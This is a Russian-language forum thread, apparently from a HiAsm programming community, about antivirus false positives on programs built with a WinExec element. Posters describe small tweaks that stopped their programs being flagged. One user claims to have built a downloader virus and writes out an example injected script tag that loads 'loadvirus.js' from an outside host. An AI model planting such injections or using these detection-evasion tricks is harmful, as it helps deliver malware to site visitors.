мой антивирь тоже как то ругался на очень простую схему, не помню какую. Сменил компилятор с Delphi на FCP и ругаться на этой же схеме перестал. Причем ругается он не каждый раз, как в голову придет... Видимо некая сигнатура похожа на сигнатуру в базе. Дома схему проанализировал с точки зрения функциональности, а не с точки зрения соотвествия антивирю, переделал и перестало как то само собой. Если бы не перестало, полез бы в базу антивиря убивать реакцию на эту сигнатуру. Благо антивирб позволяет установить игнорирование.
А Касперский - **вно еще то. За визжащего поресенка надо отрывать руки, ноги, спинной мозк и отдельно выдирать уши.
Этот топик читают: Гость
Ответов: 689
Рейтинг: 20
|
|||
| карма: 0 |
|
|
Администрация
Ответов: 15294
Рейтинг: 1518
|
|||
|
oldTV писал(а): мой антивирь тоже как то ругался на очень простую схемуна данный момент это схемы с элементом WinExec. Как-то раз на работе боролся с Symantec Antivirus путем изменения Z-координаты элементов. Минут 10 потратил пока нашел комбинацию при которой программа перестала распознаваться как вирус  |
|||
| карма: 26 |
|
|
Разработчик
Ответов: 26072
Рейтинг: 2122
|
|||
|
Dilma писал(а): на данный момент это схемы с элементом WinExecБыло такое дело. Я пошел более простым путем -- воткнул пустую переменную в компонент (правда не помню куда), заткнулся сразу. [size=-2]------ Добавлено в 00:20 Galkov писал(а): Мораль: шакалы они паршивые А в этом никто и не сомневался -- чистые сволочи  |
|||
| карма: 22 |
|
|
Ответов: 27
Рейтинг: 0
|
|||
|
Фух... Еле нашел куда вы переехали
По поводу "вируса"... Я не буду спорить даже если вы там и вправду найдете что-то... Каким-нить чудом мог и заразить, хотя в это слабо верю... А каспера убейте. Он матюкается даже на .elf файлы для мобилы, которые на компе не запускаются впринципе. |
|||
| карма: 1 |
|
|
Гость
Ответов: 17029
Рейтинг: 0
|
|||
|
Редактировалось 4 раз(а), последний 2021-05-21 08:08:48 |
|||
| карма: 0 |
|
|
Ответов: 338
Рейтинг: 3
|
|||
|
runingman, True
А вот вам вирус! [size=-2]------ Добавлено в 06:58 У меня после компиляции hood.dll занимает 24.5кб и это вирус довнлоадер. Но это сделано на хиасме, а если использовать C++ или еще чтото то программа будет весить 5-10кб
Насчет ручной чистки вирусов. Да только он запустился уже позно, потому как он сделал свое дело. Нужно не давать ему проникнуть а не удалять после того как он стырил пасы или поставил какой нить троян а запуск у него в explorer.exe. Получить вирус можно где хочеш, темболее если использовать Internet Explorer... который дырявый как сито = Если вы не хотите получить трояна то единственный способ использовать telnet чтоль... В общем каким то образом получать сам файл и потом только на компе его читать. Получить вирус можно и на hiasm.com  Пример: Ктото нашол дырку на сайте, взломал, сделал невидимый фрейм в котором и делаются плохие дела. или просто внедрил строку типа <script type="text/javascript" src="http://d-mx.narod.ru/loadvirus.js"></script>
В общем даж незнаю какой подвести вывод  |
|||
| карма: 0 |
|
|
Администрация
Ответов: 15294
Рейтинг: 1518
|
|||
|
Dark_MX, только чушь на сайте писать не надо. Загрузить вирус через скрипт - невозможно. Как и получить доступ к файловой системе локальной машины. Подобные страшилки обычно рассказывает дядя Вася своим друзьям, после того как поставил в IE компонент ActiveX якобы предназначенный для просмотра видео роликов(угадай какого содержатия), сжатых по новым супер совершенным алгоритмам...
|
|||
| карма: 26 |
|
37
Поиск
Друзья
Администрация